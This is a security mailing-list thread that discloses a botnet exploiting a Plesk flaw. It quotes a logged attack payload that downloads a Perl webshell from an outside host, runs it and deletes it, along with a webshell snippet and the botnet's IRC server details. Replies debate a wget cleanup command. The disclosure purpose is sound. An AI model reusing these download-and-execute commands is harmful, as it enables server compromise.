Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
Hi, While reading my apache server logs I found this:
Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:http://sirgeox.tk/php.jpg;curl -O
http://sirgeox.tk/php.jpg;lwp-download http://sirgeox.tk/php.jpg;fetch
http://sirgeox.tk/php.jpg;perl php.jpg;rm -rf /
tmp/php.jpg*"); ?>. [file
"/etc/modsecurity/base_rules/modsecurity_crs_40_generic_attacks.conf"]
Then i looked at the php.jpg and found a perl webshell.
my @canais=("#x"); chop (my $realname = `uname -a`); $servidor='
safe.linuxsecured.net' unless $servidor; my $porta='3303';
It used the same KingCope exploit and seems to be the same botnet owner.
His name is Geox.
His irc C&C botnet server is: safe.linuxsecured.net port 3303
Channel #x.
I think you can use your tools to takedown this too.
All the bot that are on the channel is pwned by the plesk script.
Regards,
dummys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
my action supposed to be a counter-measure agains bad guys who could register that domain and host some bad code there. you know that kind of social engineering, right? - post some fake or real advisory on popular security forum/maillist - give a link to the "patch" - - get a lot of roots i think it will be better to have that link offline - some guys will blindly run your code, then they will find out that it doesn't work and they will get enlightened by reading the code and realizing that they must change the link themselves. On Sat, 08 Jun 2013 23:50:15 +0700, wrote: We put that domain in as example, obviously we not disclose our real domain. On that domain is the clean.pl script, obvious enough. Also, thanks to person who register domain, you now have badass domain name. Perhaps host the clean.pl as final_solution.txt in webroot? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
We put that domain in as example, obviously we not disclose our real
domain. On that domain is the clean.pl script, obvious enough.
Also, thanks to person who register domain, you now have badass domain
name. Perhaps host the clean.pl as final_solution.txt in webroot?
> What happened to the link.
>
> On 6/8/13, kai wrote:
>>> wget http://botslayer.ru/final_solution.txt
>>
>> i've registered this domain just to save incompetent shitheads who
>> blindly
>>
>> run any code which is supposed to "fix security problem". why have you
>> included the non-existent domain in your code?
>>
>> thanks for your interesting investigation anyway.
>>
>>
>> Cheers,
>>
>> Kai
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> --
> --
> Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
> I.T Security Analyst and Penetration Tester
> jgichuki at inbox d0t com
>
> {FORUM}http://lists.my.co.ke/pipermail/security/
> http://chuksjonia.blogspot.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
What happened to the link.
On 6/8/13, kai wrote:
>> wget http://botslayer.ru/final_solution.txt
>
> i've registered this domain just to save incompetent shitheads who blindly
>
> run any code which is supposed to "fix security problem". why have you
> included the non-existent domain in your code?
>
> thanks for your interesting investigation anyway.
>
>
> Cheers,
>
> Kai
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
wget http://botslayer.ru/final_solution.txt i've registered this domain just to save incompetent shitheads who blindly run any code which is supposed to "fix security problem". why have you included the non-existent domain in your code? thanks for your interesting investigation anyway. Cheers, Kai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
